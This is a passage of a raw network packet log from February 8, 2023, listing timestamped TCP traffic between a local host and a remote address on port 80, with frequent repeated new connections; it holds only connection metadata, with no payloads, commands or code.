                            Feb 8, 2023 17:39:11.394660950 CET5006280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.455073118 CET805006262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.457348108 CET805006262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.457529068 CET5006280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.574729919 CET5006280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.575448990 CET5006380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.635596037 CET805006262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.635817051 CET5006280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.636693001 CET805006362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.636864901 CET5006380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.637717962 CET5006380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.699256897 CET805006362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.701730967 CET805006362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.701975107 CET5006380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.807591915 CET5006380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.808516979 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.869138956 CET805006362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.869282961 CET5006380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.870928049 CET805006462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.871051073 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.871504068 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.933904886 CET805006462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.936068058 CET805006462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.936132908 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.048929930 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.049812078 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.111654043 CET805006562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.111692905 CET805006462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.111884117 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.111920118 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.112270117 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.174149036 CET805006562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.177773952 CET805006562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.177875042 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.290231943 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.291878939 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.351392984 CET805006662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.351476908 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.351866007 CET805006562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.351962090 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.352601051 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.411828041 CET805006662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.414014101 CET805006662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.414186001 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.525558949 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.526964903 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.585059881 CET805006662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.585184097 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.587275028 CET805006762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.587394953 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.587873936 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.648269892 CET805006762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.650434971 CET805006762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.650516033 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.759605885 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.760746956 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.823084116 CET805006862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.823276043 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.823951006 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.885303974 CET805006862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.887738943 CET805006862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.887900114 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.993813992 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.995038033 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.055373907 CET805006862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.055533886 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.056196928 CET805006962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.056317091 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.057358027 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.070317984 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.119081974 CET805006962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.122652054 CET805006962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.122879028 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.130878925 CET805006762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.132982969 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.235125065 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.236795902 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.296674013 CET805006962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.296902895 CET5006980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.298315048 CET805007062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.298490047 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.299293041 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.360929966 CET805007062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.363473892 CET805007062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.363658905 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.477710962 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.478571892 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.538151979 CET805007162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.539341927 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.539390087 CET805007062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.539786100 CET5007080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.540692091 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.600233078 CET805007162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.602624893 CET805007162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.602864027 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.712066889 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.713434935 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.771509886 CET805007162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.771855116 CET5007180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.774796963 CET805007262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.776880980 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.789124012 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.850603104 CET805007262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.853332043 CET805007262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:13.855465889 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.961566925 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:13.962168932 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.023343086 CET805007262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.023531914 CET5007280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.024719954 CET805007362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.024837971 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.025211096 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.087819099 CET805007362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.091411114 CET805007362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.091556072 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.196455956 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.197429895 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.258053064 CET805007462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.258232117 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.259121895 CET805007362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.259248972 CET5007380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.260435104 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.321902990 CET805007462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.324162006 CET805007462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.324266911 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.431209087 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.431984901 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.491905928 CET805007462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.492031097 CET805007562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.492172003 CET5007480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.492274046 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.493858099 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.554119110 CET805007562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.559590101 CET805007562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.559741020 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.666830063 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.668126106 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.727144003 CET805007562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.727287054 CET5007580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.727634907 CET805007662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.727785110 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.728959084 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.788563013 CET805007662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.790911913 CET805007662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.791042089 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.916178942 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.917269945 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.975888014 CET805007662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.976025105 CET5007680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.978601933 CET805007762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:14.978744984 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:14.979084969 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.041541100 CET805007762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.045377970 CET805007762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.045561075 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.152221918 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.152932882 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.214298010 CET805007762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.214519024 CET805007862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.214541912 CET5007780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.214790106 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.231604099 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.293329000 CET805007862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.295681000 CET805007862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.295799017 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.411355019 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.412148952 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.472481012 CET805007962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.472712994 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.474750996 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.474946976 CET805007862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.475068092 CET5007880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.535200119 CET805007962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.537436008 CET805007962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.537508011 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.660403967 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.661120892 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.720695019 CET805008062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.720736980 CET805007962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.720788002 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.720828056 CET5007980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.721318960 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.780972004 CET805008062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.783492088 CET805008062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.783633947 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.900047064 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.901081085 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.959820986 CET805008062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.962655067 CET805008162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:15.962840080 CET5008080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.962888002 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:15.969624043 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.031378031 CET805008162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.033631086 CET805008162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.033751965 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.149317980 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.150060892 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.211194992 CET805008162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.211338043 CET5008180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.212522030 CET805008262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.213114023 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.214185953 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.276773930 CET805008262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.280766010 CET805008262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.281028986 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.386317968 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.388760090 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.449043036 CET805008262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.449290991 CET5008280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.449421883 CET805008362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.449569941 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.450190067 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.510740042 CET805008362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.513186932 CET805008362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.515681028 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.621385098 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.623502970 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.682220936 CET805008362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.682555914 CET5008380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.683778048 CET805008462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.683887959 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.684237003 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.745601892 CET805008462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.747688055 CET805008462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.751669884 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.880429029 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.881313086 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.940907001 CET805008462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.941508055 CET805008562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:16.941687107 CET5008480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.941759109 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:16.942706108 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.003218889 CET805008562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.006316900 CET805008562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.006628036 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.119816065 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.120832920 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.180507898 CET805008562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.180711031 CET5008580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.181858063 CET805008662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.182028055 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.186332941 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.246824026 CET805008662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.251060963 CET805008662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.251202106 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.352545023 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.353398085 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.413093090 CET805008662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.413389921 CET5008680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.414086103 CET805008762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.414275885 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.420202971 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.482554913 CET805008762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.484596014 CET805008762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.484774113 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.593674898 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.594472885 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.656564951 CET805008762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.656627893 CET805008862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.656785965 CET5008780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.656938076 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.657423973 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.719161034 CET805008862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.721311092 CET805008862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.721446991 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.847239017 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.848162889 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.909302950 CET805008862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.909430027 CET805008962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.909598112 CET5008880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.909832954 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.910351038 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:17.971684933 CET805008962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.974165916 CET805008962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:17.974399090 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.086999893 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.087740898 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.148911953 CET805009062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.149051905 CET805008962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.149130106 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.149189949 CET5008980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.150814056 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.211919069 CET805009062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.215178967 CET805009062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.215322971 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.325419903 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.326456070 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.386177063 CET805009062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.386321068 CET5009080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.390924931 CET805009162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.391160965 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.399399042 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.461292982 CET805009162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.464189053 CET805009162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.464323997 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.571465969 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.572386026 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.631850958 CET805009262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.632030964 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.633208990 CET805009162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.633321047 CET5009180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.634985924 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.694705963 CET805009262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.697040081 CET805009262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.697171926 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.812550068 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.813465118 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.872040033 CET805009262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.872143984 CET5009280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.874893904 CET805009362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.875031948 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.875583887 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:18.937060118 CET805009362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.939227104 CET805009362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:18.939289093 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.063987970 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.064918995 CET5009480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.125741959 CET805009362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.125911951 CET5009380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.126342058 CET805009462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.126533985 CET5009480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.127295971 CET5009480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.188819885 CET805009462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.192943096 CET805009462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.193006992 CET5009480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.305977106 CET5009480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.306618929 CET5009580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.368499994 CET805009462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.368771076 CET805009562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.368906021 CET5009480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.368942022 CET5009580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.370464087 CET5009580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.433096886 CET805009562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.435214996 CET805009562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.436100006 CET5009580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.540795088 CET5009580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.541544914 CET5009680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.602329969 CET805009562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.602489948 CET5009580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.603396893 CET805009662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.606029034 CET5009680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.609783888 CET5009680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.671659946 CET805009662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.674107075 CET805009662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.675386906 CET5009680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.819150925 CET5009680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.820086956 CET5009780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.881048918 CET805009662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.881408930 CET5009680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.881628036 CET805009762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.881746054 CET5009780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.882190943 CET5009780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:19.943770885 CET805009762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.946125984 CET805009762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:19.946312904 CET5009780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:20.056286097 CET5009780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:20.057001114 CET5009880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:20.117626905 CET805009862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:20.117762089 CET805009762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:20.117826939 CET5009780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:20.118103027 CET5009880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:20.119029045 CET5009880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:20.185494900 CET805009862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:20.185551882 CET805009862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:20.185707092 CET5009880192.168.2.462.204.41.4
